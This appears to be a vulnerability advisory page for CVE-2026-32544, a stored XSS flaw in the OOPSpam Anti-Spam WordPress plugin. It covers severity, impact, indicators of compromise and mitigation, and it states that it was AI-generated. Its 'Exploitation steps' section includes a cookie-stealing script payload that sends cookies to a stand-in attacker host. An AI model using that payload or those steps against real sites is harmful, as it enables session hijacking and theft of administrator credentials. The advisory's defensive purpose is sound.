CVE-2026-32544
WordPress vulnerability analysis and mitigation

Overview

CVE-2026-32544 is a Stored Cross-Site Scripting (XSS) vulnerability in the OOPSpam Anti-Spam WordPress plugin developed by OOPSpam Team. It affects all versions of the plugin up to and including 1.2.62, and was published on March 25, 2026, with Patchstack credited as the assigner. The vulnerability carries a CVSS v3.1 base score of 7.1 (High), reflecting its network-based attack vector and cross-site scope impact (Feedly, Patchstack).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), specifically the Stored XSS variant. It arises from insufficient sanitization or escaping of user-supplied input within the OOPSpam Anti-Spam plugin before it is rendered in web pages, allowing malicious scripts to be persistently stored and later executed in victims' browsers. Exploitation requires no privileges (unauthenticated) but does require user interaction (a victim visiting or loading the affected page), and the scope is changed, meaning the injected script can affect resources beyond the vulnerable component (Feedly, Patchstack).

Impact

Successful exploitation allows an attacker to inject persistent malicious JavaScript into the WordPress site, which executes in the browsers of all users who visit the affected page — including administrators. This can lead to session hijacking, credential theft, unauthorized administrative actions, defacement, or redirection of users to malicious sites. The CVSS assessment indicates low confidentiality, integrity, and availability impacts individually, but the changed scope means the attack can affect users beyond the plugin's own context (Feedly).

Exploitability

No public proof-of-concept exploit code or evidence of in-the-wild exploitation has been reported for CVE-2026-32544 as of the available data. The EPSS score is approximately 0.033% (0.000330), indicating a low probability of exploitation in the near term. The vulnerability has been detected by Qualys scanners and is not currently listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. No threat actor attribution has been identified (Feedly).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the OOPSpam Anti-Spam plugin version 1.2.62 or earlier using tools like WPScan or by inspecting plugin metadata in publicly accessible WordPress installations.
  2. Identify injection point: Locate the input field(s) within the plugin that are vulnerable to stored XSS — typically form fields, settings inputs, or comment/spam-related data that the plugin processes and stores.
  3. Craft malicious payload: Prepare a JavaScript payload such as <script>document.location='https://attacker.com/steal?c='+document.cookie;</script> or a more sophisticated payload for session hijacking or admin action forgery.
  4. Submit payload: Submit the crafted payload through the vulnerable input (e.g., a contact form, plugin configuration field, or other user-facing input processed by the plugin), causing it to be stored in the WordPress database.
  5. Trigger execution: Wait for an authenticated user (ideally an administrator) to visit the page or admin panel section where the stored payload is rendered, causing the malicious script to execute in their browser.
  6. Achieve objective: Harvest session cookies, perform unauthorized actions on behalf of the victim, or escalate privileges on the WordPress site (Feedly, Patchstack).

Indicators of compromise

  • Logs: WordPress access logs showing unexpected POST requests to plugin-related endpoints with script tags or encoded JavaScript in request bodies; error logs showing unusual output from the OOPSpam Anti-Spam plugin.
  • Database: WordPress database entries (e.g., in wp_options, wp_postmeta, or plugin-specific tables) containing <script>, javascript:, onerror=, or other XSS payload patterns associated with OOPSpam Anti-Spam data.
  • Network: Outbound requests from victim browsers to unknown external domains shortly after visiting pages where the plugin renders content; traffic to attacker-controlled cookie-harvesting endpoints.
  • File System: Unexpected modifications to plugin files or WordPress core files that may indicate post-exploitation activity following successful XSS-based admin compromise.

Mitigation and workarounds

WordPress site administrators should update the OOPSpam Anti-Spam plugin to a version later than 1.2.62, which contains the fix for this vulnerability. Until an update can be applied, consider temporarily deactivating the plugin to eliminate the attack surface. Additionally, deploying a Web Application Firewall (WAF) with XSS filtering rules (such as those provided by Wordfence or Cloudflare) can help mitigate exploitation attempts in the interim (Patchstack, Feedly).

Community reactions

Wordfence included CVE-2026-32544 in its weekly WordPress vulnerability report covering March 23–29, 2026, highlighting it as part of a broader set of plugin vulnerabilities disclosed that week (Wordfence Blog). No significant independent researcher commentary or notable social media discussion has been identified beyond standard vulnerability aggregator coverage.

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-78570CRITICAL9.8
  • totaldonations
NoNoAug 25, 2026
CVE-2026-78568CRITICAL9.8
  • totaldonations
NoNoAug 25, 2026
CVE-2026-78572HIGH8.1
  • kalles-addons
NoNoAug 25, 2026
CVE-2026-78576HIGH7.5
  • readabler
NoYesAug 25, 2026
CVE-2026-76128MEDIUM6.4
  • ecommerce-product-catalog
NoYesAug 25, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management